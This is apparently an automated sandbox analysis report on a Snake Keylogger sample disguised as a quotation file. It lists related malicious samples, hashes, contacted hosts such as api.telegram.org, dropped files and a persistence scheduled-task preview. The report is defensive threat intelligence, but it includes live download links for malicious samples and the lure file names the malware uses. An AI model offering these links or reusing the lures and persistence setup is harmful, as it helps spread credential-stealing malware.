                                                                                                            • filetransfer.io/data-package/XrlEIxYp/download
                                                                                                            QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • filetransfer.io/data-package/7pdXjNKP/download
                                                                                                            gusetup.exeGet hashmaliciousUnknownBrowse
                                                                                                            • go.glarysoft.com/g/t/releasenotes/cn/10000/s/Glary%20Utilities/v/6.16.0.20
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            reallyfreegeoip.orgMB267382625AE.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.96.3
                                                                                                            Quote specification and BOQ.exeGet hashmaliciousGuLoaderBrowse
                                                                                                            • 188.114.96.3
                                                                                                            QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            e-dekont_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            REPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 188.114.96.3
                                                                                                            Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 188.114.96.3
                                                                                                            rPO_1079021908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 188.114.96.3
                                                                                                            INQUIRY_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            P.O 423737.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 188.114.96.3
                                                                                                            api.telegram.orgQuote specification and BOQ.exeGet hashmaliciousGuLoaderBrowse
                                                                                                            • 149.154.167.220
                                                                                                            e-dekont_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            REPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            file.exeGet hashmaliciousAilurophile StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            INQUIRY_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            P.O 423737.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuYGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            TELEGRAMRUQuote specification and BOQ.exeGet hashmaliciousGuLoaderBrowse
                                                                                                            • 149.154.167.220
                                                                                                            e-dekont_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            REPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            file.exeGet hashmaliciousAilurophile StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            INQUIRY_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            P.O 423737.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuYGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            CLOUDFLARENETUShttps://2kio0wi0iat.freewebhostmost.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.18.11.207
                                                                                                            A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 188.114.96.3
                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                            • 188.114.97.3
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 188.114.97.3
                                                                                                            SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 104.21.4.93
                                                                                                            MB267382625AE.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.96.3
                                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                            • 188.114.96.3
                                                                                                            Quote specification and BOQ.exeGet hashmaliciousGuLoaderBrowse
                                                                                                            • 188.114.96.3
                                                                                                            QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.96.3
                                                                                                            Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                            • 188.114.97.3
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            54328bd36c14bd82ddaa0c04b25ed9adMB267382625AE.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.96.3
                                                                                                            Quote specification and BOQ.exeGet hashmaliciousGuLoaderBrowse
                                                                                                            • 188.114.96.3
                                                                                                            QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.96.3
                                                                                                            e-dekont_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 188.114.96.3
                                                                                                            Benefit Enrollment -wZ5nusm.pdfGet hashmaliciousUnknownBrowse
                                                                                                            • 188.114.96.3
                                                                                                            REPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 188.114.96.3
                                                                                                            Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 188.114.96.3
                                                                                                            rPO_1079021908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 188.114.96.3
                                                                                                            INQUIRY_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 188.114.96.3
                                                                                                            P.O 423737.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 188.114.96.3
                                                                                                            3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 149.154.167.220
                                                                                                            seethebestthingswithgreatsituationshandletotheprogress.htaGet hashmaliciousCobalt Strike, AgentTesla, HTMLPhisherBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Quote specification and BOQ.exeGet hashmaliciousGuLoaderBrowse
                                                                                                            • 149.154.167.220
                                                                                                            QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Towered.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                            • 149.154.167.220
                                                                                                            quote001.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                            • 149.154.167.220
                                                                                                            e-dekont_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            globe_product_order_korea_buy_20_11_2024_000000000000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                            • 149.154.167.220
                                                                                                            https://docs.google.com/drawings/d/14vwfD0EyLvfyX8ls6jwkhRJmCoYW07SUFnqprqeXkTI/previewGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            No context
                                                                                                            Process:C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1216
                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                            Malicious:true
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                            Process:C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1216
                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                            Malicious:false
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):2232
                                                                                                            Entropy (8bit):5.379494043211775
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:fWSU4xympx4RhgZoU99tK8NPZHUJ7u1iMugeC/ZqUyus:fLHxv/I6WA2KRHKOugzs
                                                                                                            MD5:65C8A8195D8C3A860738FA84F5E0E2CA
                                                                                                            SHA1:A14579945A9E0C7AE44F6F7A94573CACC3166F79
                                                                                                            SHA-256:3C0C30803F2F32A3254CBB415F55DF0344C2BC5144359EFEA489306D5163BAE5
                                                                                                            SHA-512:AD09015D0779795086087E60EDC97924E61322F7E5A62A484D868595236D26CCF62489F6CE791681B3A56F4FD47DE84D2659A420ACEB755C63128922ED478A5E
                                                                                                            Malicious:false
                                                                                                            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                                            File Type:XML 1.0 document, ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1583
                                                                                                            Entropy (8bit):5.102914204921392
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtVJxvn:cgergYrFdOFzOzN33ODOiDdKrsuTRv
                                                                                                            MD5:C4B6C2328162A258D5BBEE03B7D696CA
                                                                                                            SHA1:CE54C9B4E8D9B7FC4A38EA900C29FDC6E98C43C6
                                                                                                            SHA-256:C479C1800B451FB3493B0F51A6FA474FE5BB8566C92BE4D1C2408480ED2FF0D6
                                                                                                            SHA-512:1EA8BF40F37A95955D3B987A1CAE958AC3C91A00F9F552C63C4630117A3910FE8D280773B1AD19A93D57C240DDF2AC170EA19079DA238D11AC50A68F2338ED13
                                                                                                            Malicious:true
                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                                                                            Process:C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
                                                                                                            File Type:XML 1.0 document, ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1583
                                                                                                            Entropy (8bit):5.102914204921392
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtVJxvn:cgergYrFdOFzOzN33ODOiDdKrsuTRv
                                                                                                            MD5:C4B6C2328162A258D5BBEE03B7D696CA
                                                                                                            SHA1:CE54C9B4E8D9B7FC4A38EA900C29FDC6E98C43C6
                                                                                                            SHA-256:C479C1800B451FB3493B0F51A6FA474FE5BB8566C92BE4D1C2408480ED2FF0D6
                                                                                                            SHA-512:1EA8BF40F37A95955D3B987A1CAE958AC3C91A00F9F552C63C4630117A3910FE8D280773B1AD19A93D57C240DDF2AC170EA19079DA238D11AC50A68F2338ED13
                                                                                                            Malicious:false
                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                                                                            Process:C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):787968
                                                                                                            Entropy (8bit):7.937656149965491
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:nrOm+Ri3AgFdiFJ02txMwyv75ykUeobZ+G8uRGYK9dQLtVd+8hbi7E078mDX:SQ3AgQJHtxzPkrob827UQr/QE078mDX
                                                                                                            MD5:7B5985233FAF11890E9CF4C7B579983B
                                                                                                            SHA1:CB2F20AD79EA7D8A1758AC2AE90A1C6D7F47E784
                                                                                                            SHA-256:5CCE0CED936E5D9C13D6A4A8A3C149371C92236EB4C465E0E422142946509CEA
                                                                                                            SHA-512:BB8DD656EBF8A7C3C1A2ABB86D10E0647E6C84F5D090EC8725FCA504691F517C8B5776E2305BF041551E3D311ECD5797371A9C2CF77714EE8AC03B477B42CD0B
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 34%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....P=g..............0...... ........... ... ....@.. .......................`............`.....................................O.... ..|....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B........................H........6...(...........^...............................................(......}.....{....r...p .....o5....{....o7...&*....0...........{......o9.....}........&.....*..................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=........*......+..E..........\b......2.{....oA...*n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...
                                                                                                            Process:C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):26
                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                            Malicious:true
                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Entropy (8bit):7.937656149965491
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                            File name:Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                                            File size:787'968 bytes
                                                                                                            MD5:7b5985233faf11890e9cf4c7b579983b
                                                                                                            SHA1:cb2f20ad79ea7d8a1758ac2ae90a1c6d7f47e784
                                                                                                            SHA256:5cce0ced936e5d9c13d6a4a8a3c149371c92236eb4c465e0e422142946509cea
                                                                                                            SHA512:bb8dd656ebf8a7c3c1a2abb86d10e0647e6c84f5d090ec8725fca504691f517c8b5776e2305bf041551e3d311ecd5797371a9c2cf77714ee8ac03b477b42cd0b
